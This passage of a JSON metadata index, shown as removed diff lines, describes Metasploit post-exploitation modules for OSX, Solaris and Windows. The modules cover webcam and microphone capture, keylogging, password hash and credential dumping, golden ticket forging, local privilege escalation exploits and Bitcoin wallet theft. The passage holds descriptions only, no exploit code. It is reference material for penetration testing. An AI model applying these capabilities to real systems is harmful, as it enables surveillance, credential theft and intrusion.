"ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Show a list of stored network share credentials" - }, - { - "name": "MOUNT", - "description": "Mount a network shared volume using stored credentials" - }, - { - "name": "UMOUNT", - "description": "Unmount a mounted volume" - } - ] - }, - "post_osx/manage/record_mic": { - "name": "OSX Manage Record Microphone", - "fullname": "post/osx/manage/record_mic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "This module will allow the user to detect (with the LIST action) and\n capture (with the RECORD action) audio inputs on a remote OSX machine.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/record_mic.rb", - "is_install_path": true, - "ref_name": "osx/manage/record_mic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Show a list of microphones" - }, - { - "name": "RECORD", - "description": "Record from a selected audio input" - } - ] - }, - "post_osx/manage/sonic_pi": { - "name": "OS X Manage Sonic Pi", - "fullname": "post/osx/manage/sonic_pi", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sam Aaron", - "wvu " - ], - "description": "This module controls Sonic Pi via its local OSC server.\n\n The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.\n\n Yes, this is RCE, but it's local. I suggest playing music. :-)", - "references": [ - "URL-https://sonic-pi.net/", - "URL-https://github.com/samaaron/sonic-pi/wiki/Sonic-Pi-Internals----GUI-Ruby-API", - "URL-http://opensoundcontrol.org/spec-1_0" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/sonic_pi.rb", - "is_install_path": true, - "ref_name": "osx/manage/sonic_pi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "audio-effects", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Run", - "description": "Run Sonic Pi code" - }, - { - "name": "Stop", - "description": "Stop all jobs" - } - ] - }, - "post_osx/manage/vpn": { - "name": "OSX VPN Manager", - "fullname": "post/osx/manage/vpn", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Peter Toth " - ], - "description": "This module lists VPN connections and tries to connect to them using stored credentials.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/vpn.rb", - "is_install_path": true, - "ref_name": "osx/manage/vpn", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "CONNECT", - "description": "Connect to a VPN using stored credentials" - }, - { - "name": "DISCONNECT", - "description": "Disconnect from a VPN" - }, - { - "name": "LIST", - "description": "Show a list of VPN connections" - } - ] - }, - "post_osx/manage/webcam": { - "name": "OSX Manage Webcam", - "fullname": "post/osx/manage/webcam", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "This module will allow the user to detect installed webcams (with\n the LIST action), take a snapshot (with the SNAPSHOT action), or\n record a webcam and mic (with the RECORD action).", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/webcam.rb", - "is_install_path": true, - "ref_name": "osx/manage/webcam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Show a list of webcams" - }, - { - "name": "RECORD", - "description": "Record with the webcam" - }, - { - "name": "SNAPSHOT", - "description": "Take a snapshot with the webcam" - } - ] - }, - "post_solaris/escalate/pfexec": { - "name": "Solaris pfexec Upgrade Shell", - "fullname": "post/solaris/escalate/pfexec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module attempts to upgrade a shell session to UID 0 using pfexec.", - "references": [ - "URL-https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html", - "URL-http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html", - "URL-http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec" - ], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/escalate/pfexec.rb", - "is_install_path": true, - "ref_name": "solaris/escalate/pfexec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/escalate/srsexec_readline": { - "name": "Solaris srsexec Arbitrary File Reader", - "fullname": "post/solaris/escalate/srsexec_readline", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-05-07", - "type": "post", - "author": [ - "h00die", - "iDefense" - ], - "description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n When srsexec is executed in debug (-d) verbose (-v) mode,\n the first line of an arbitrary file can be read due to the suid bit set.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.", - "references": [ - "CVE-2007-2617", - "URL-https://download.oracle.com/sunalerts/1000443.1.html", - "URL-https://www.securityfocus.com/archive/1/468235", - "EDB-30021", - "BID-23915" - ], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/escalate/srsexec_readline.rb", - "is_install_path": true, - "ref_name": "solaris/escalate/srsexec_readline", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/gather/checkvm": { - "name": "Solaris Gather Virtual Environment Detection", - "fullname": "post/solaris/gather/checkvm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Solaris Zone, VMWare, VirtualBox, Xen,\n and QEMU/KVM.", - "references": [], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/gather/checkvm.rb", - "is_install_path": true, - "ref_name": "solaris/gather/checkvm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/gather/enum_packages": { - "name": "Solaris Gather Installed Packages", - "fullname": "post/solaris/gather/enum_packages", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Post module to enumerate installed packages on a Solaris system.", - "references": [], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/gather/enum_packages.rb", - "is_install_path": true, - "ref_name": "solaris/gather/enum_packages", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/gather/enum_services": { - "name": "Solaris Gather Configured Services", - "fullname": "post/solaris/gather/enum_services", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Post module to enumerate services on a Solaris system.", - "references": [], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/gather/enum_services.rb", - "is_install_path": true, - "ref_name": "solaris/gather/enum_services", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/gather/hashdump": { - "name": "Solaris Gather Dump Password Hashes for Solaris Systems", - "fullname": "post/solaris/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Post module to dump the password hashes for all users on a Solaris system.", - "references": [], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "solaris/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/capture/keylog_recorder": { - "name": "Windows Capture Keystroke Recorder", - "fullname": "post/windows/capture/keylog_recorder", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Josh Hale " - ], - "description": "This module can be used to capture keystrokes. To capture keystrokes when the session is running\n as SYSTEM, the MIGRATE option must be enabled and the CAPTURE_TYPE option should be set to one of\n Explorer, Winlogon, or a specific PID. To capture the keystrokes of the interactive user, the\n Explorer option should be used with MIGRATE enabled. Keep in mind that this will demote this session\n to the user's privileges, so it makes sense to create a separate session for this task. The Winlogon\n option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN\n option can be combined with the Winlogon CAPTURE_TYPE to for the user to enter their clear-text\n password. It is recommended to run this module as a job, otherwise it will tie up your framework user interface.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/capture/keylog_recorder.rb", - "is_install_path": true, - "ref_name": "windows/capture/keylog_recorder", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/capture/lockout_keylogger": { - "name": "Windows Capture Winlogon Lockout Credential Keylogger", - "fullname": "post/windows/capture/lockout_keylogger", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix ", - "cg" - ], - "description": "This module migrates and logs Microsoft Windows user's passwords via\n Winlogon.exe using idle time and natural system changes to give a\n false sense of security to the user.", - "references": [ - "URL-http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/capture/lockout_keylogger.rb", - "is_install_path": true, - "ref_name": "windows/capture/lockout_keylogger", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/droplnk": { - "name": "Windows Escalate SMB Icon LNK Dropper", - "fullname": "post/windows/escalate/droplnk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module drops a shortcut (LNK file) that has a ICON reference\n existing on the specified remote host, causing SMB and WebDAV\n connections to be initiated from any user that views the shortcut.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/droplnk.rb", - "is_install_path": true, - "ref_name": "windows/escalate/droplnk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/getsystem": { - "name": "Windows Escalation", - "fullname": "post/windows/escalate/getsystem", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm " - ], - "description": "This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various\n techniques.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/getsystem.rb", - "is_install_path": true, - "ref_name": "windows/escalate/getsystem", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Named Pipe Impersonation", - "Token Duplication", - "RPCSS", - "PrintSpooler", - "EFSRPC", - "EfsPotato" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/golden_ticket": { - "name": "Windows Escalate Golden Ticket", - "fullname": "post/windows/escalate/golden_ticket", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will create a Golden Kerberos Ticket using the Mimikatz Kiwi Extension. If no\n options are applied it will attempt to identify the current domain, the domain administrator\n account, the target domain SID, and retrieve the krbtgt NTLM hash from the database. By default\n the well-known Administrator's groups 512, 513, 518, 519, and 520 will be applied to the ticket.", - "references": [ - "URL-https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/golden_ticket.rb", - "is_install_path": true, - "ref_name": "windows/escalate/golden_ticket", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/ms10_073_kbdlayout": { - "name": "Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation", - "fullname": "post/windows/escalate/ms10_073_kbdlayout", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-10-12", - "type": "post", - "author": [ - "Ruben Santamarta", - "jduck " - ], - "description": "This module exploits the keyboard layout vulnerability exploited by Stuxnet. When\n processing specially crafted keyboard layout files (DLLs), the Windows kernel fails\n to validate that an array index is within the bounds of the array. By loading\n a specially crafted keyboard layout, an attacker can execute code in Ring 0.", - "references": [ - "OSVDB-68552", - "CVE-2010-2743", - "MSB-MS10-073", - "URL-https://web.archive.org/web/20160308010201/http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1", - "EDB-15985" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb", - "is_install_path": true, - "ref_name": "windows/escalate/ms10_073_kbdlayout", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-down" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/screen_unlock": { - "name": "Windows Escalate Locked Desktop Unlocker", - "fullname": "post/windows/escalate/screen_unlock", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "L4teral ", - "Metlstorm" - ], - "description": "This module unlocks a locked Windows desktop by patching\n the respective code inside the LSASS.exe process. This\n patching process can result in the target system hanging or\n even rebooting, so be careful when using this module on\n production systems.", - "references": [ - "URL-http://www.storm.net.nz/projects/16" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/screen_unlock.rb", - "is_install_path": true, - "ref_name": "windows/escalate/screen_unlock", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-down" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/unmarshal_cmd_exec": { - "name": "Windows unmarshal post exploitation", - "fullname": "post/windows/escalate/unmarshal_cmd_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-08-05", - "type": "post", - "author": [ - "Nicolas Joly", - "Matthias Kaiser", - "Sanjay Gondaliya", - "Pratik Shah " - ], - "description": "This module exploits a local privilege escalation bug which exists\n in Microsoft COM for Windows when it fails to properly handle serialized objects.", - "references": [ - "CVE-2018-0824", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824", - "URL-https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn", - "EDB-44906" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/unmarshal_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/escalate/unmarshal_cmd_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/ad_to_sqlite": { - "name": "AD Computer, Group and Recursive User Membership to Local SQLite DB", - "fullname": "post/windows/gather/ad_to_sqlite", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n and write this to a SQLite database for offline analysis and query using normal SQL syntax.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/ad_to_sqlite.rb", - "is_install_path": true, - "ref_name": "windows/gather/ad_to_sqlite", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/arp_scanner": { - "name": "Windows Gather ARP Scanner", - "fullname": "post/windows/gather/arp_scanner", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will perform an ARP scan for a given IP range through a\n Meterpreter session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/arp_scanner.rb", - "is_install_path": true, - "ref_name": "windows/gather/arp_scanner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/avast_memory_dump": { - "name": "Avast AV Memory Dumping Utility", - "fullname": "post/windows/gather/avast_memory_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "DLL_Cool_J" - ], - "description": "This module leverages an Avast Anti-Virus memory dump utility that is shipped\n by default with Avast Anti-Virus Home software suite.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/gather/avast_memory_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/avast_memory_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/bitcoin_jacker": { - "name": "Windows Gather Bitcoin Wallet", - "fullname": "post/windows/gather/bitcoin_jacker", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "illwill ", - "todb " - ], - "description": "This module downloads any Bitcoin wallet files from the target\n system. It currently supports both the classic Satoshi wallet and the\n more recent Armory wallets. Note that Satoshi wallets tend to be\n unencrypted by default, while Armory wallets tend to be encrypted by default.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/bitcoin_jacker.rb", - "is_install_path": true, - "ref_name": "windows/gather/bitcoin_jacker", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/bitlocker_fvek": { - "name": "Bitlocker Master Key (FVEK) Extraction", - "fullname": "post/windows/gather/bitlocker_fvek", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Danil Bazin " - ], - "description": "This module enumerates ways to decrypt Bitlocker volume and if a recovery key is stored locally\n or can be generated, dump the Bitlocker master key (FVEK)", - "references": [ - "URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc", - "URL-https://web.archive.org/web/20170914195545/http://www.hsc.fr/ressources/outils/dislocker/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-03 12:57:40 +0000", - "path": "/modules/post/windows/gather/bitlocker_fvek.rb", - "is_install_path": true, - "ref_name": "windows/gather/bitlocker_fvek", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/bloodhound": { - "name": "BloodHound Ingestor", - "fullname": "post/windows/gather/bloodhound", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h4ng3r ", - "h00die" - ], - "description": "This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more.\n With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly\n identify within an Active Directory environment.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/bloodhound.rb", - "is_install_path": true, - "ref_name": "windows/gather/bloodhound", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "sharphound" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/cachedump": { - "name": "Windows Gather Credential Cache Dump", - "fullname": "post/windows/gather/cachedump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Maurizio Agazzini ", - "mubix " - ], - "description": "This module uses the registry to extract the stored domain hashes that have been\n cached as a result of a GPO setting. The default setting on Windows is to store\n the last ten successful logins.", - "references": [ - "URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/cachedump.rb", - "is_install_path": true, - "ref_name": "windows/gather/cachedump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/checkvm": { - "name": "Windows Gather Virtual Environment Detection", - "fullname": "post/windows/gather/checkvm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Aaron Soto " - ], - "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen, QEMU,\n and Parallels.", - "references": [ - "URL-https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf", - "URL-https://www.heise.de/security/downloads/07/1/1/8/3/5/5/9/vmde.pdf", - "URL-https://evasions.checkpoint.com/techniques/registry.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/checkvm.rb", - "is_install_path": true, - "ref_name": "windows/gather/checkvm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/adi_irc": { - "name": "Adi IRC credential gatherer", - "fullname": "post/windows/gather/credentials/adi_irc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on AdiIRC Client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/adi_irc.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/adi_irc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/aim": { - "name": "Aim credential gatherer", - "fullname": "post/windows/gather/credentials/aim", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Aim credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/aim.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/aim", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/avira_password": { - "name": "Windows Gather Avira Password Extraction", - "fullname": "post/windows/gather/credentials/avira_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Robert Kugler / robertchrk" - ], - "description": "This module extracts the weakly hashed password\n which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/avira_password.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/avira_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": 